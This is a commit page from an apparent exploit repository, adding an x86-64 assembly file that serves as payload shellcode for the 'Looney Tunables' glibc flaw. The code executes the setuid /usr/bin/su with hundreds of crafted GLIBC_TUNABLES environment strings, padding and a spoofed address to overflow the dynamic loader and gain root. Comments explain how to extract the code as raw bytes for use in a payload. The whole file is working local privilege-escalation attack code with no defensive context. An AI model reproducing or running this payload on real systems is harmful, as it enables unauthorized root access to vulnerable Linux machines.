~hckng/exploits

a858bb2704ca8762da737c8bf7b8bf67998a2b5f — isra 5 months ago 6333bf2
added sample assembly code used for payload
1 files changed, 83 insertions(+), 0 deletions(-)

A looney_sample.s
A looney_sample.s => looney_sample.s +83 -0
@@ 0,0 1,83 @@
;objcopy -O binary -j .text execve.o execve
;od -An -v -t x1 execve > hexcontent

BITS 64
global main
section .text
main:
    call run
    db "/usr/bin/su", 0x0
    db "--help", 0x0
    db "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=PPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPPP", 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x0
    db "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=XXXXXXXX", 0x0
    db "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=XXXXXXX", 0x0
    db "GLIBC_TUNABLES=glibc.mem.tagging=YYYYYYYYYYYYYYYYYYYYYYYY", 0x0
    db `\f\20\20\20\376\177`, 0x0
    db `\370\377\377\377\377\377\377\377\370`, 0x0 ; repeate 16382 times
    
 run:
    ;;;;;;;;;;;;;;;;;;;;;;;;;
    ; call su
    ;;;;;;;;;;;;;;;;;;;;;;;;;
    pop rsi
    xor rax, rax
    ; filename "/usr/bin/su"
    lea rdi, [rsi]   
    

    ; envp (in reverse)
    push rax

    mov ecx, 47
    l1:
    dec ecx
    lea rbx, [rsi+835]
    push rbx
    jne l1

    mov ecx, 385
    l2:
    dec ecx
    lea rbx, [rsi+18]
    push rbx
    jne l2


    ; push addr
    lea rbx, [rsi+828] ; "addr in Q format"
    push rbx

    mov ecx, 172
    l3:
    dec ecx
    lea rbx, [rsi+18]
    push rbx
    jne l3


    lea rbx, [rsi+770] ; "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=Y x 24"
    push rbx
    lea rbx, [rsi+711] ; "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=X x 7"
    push rbx
    lea rbx, [rsi+651] ; "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=X x 8"
    push rbx
    lea rbx, [rsi+19] ; "GLIBC_TUNABLES=glibc.mem.tagging=glibc.mem.tagging=P x 561"
    push rbx
    mov rdx, rsp

    ; argv
    ; ["/usr/bin/su", "--help"] (in reverse)
    push rax
    lea rbx, [rsi+12] ; "--help"
    push rbx
    push rdi          ; "/usr/bin/su"
    mov rsi, rsp 


    ; execve & exit
    xor rax, rax
    mov rax, 59
    syscall
    xor rdx, rdx
    mov rax, 60
    syscall
\ No newline at end of file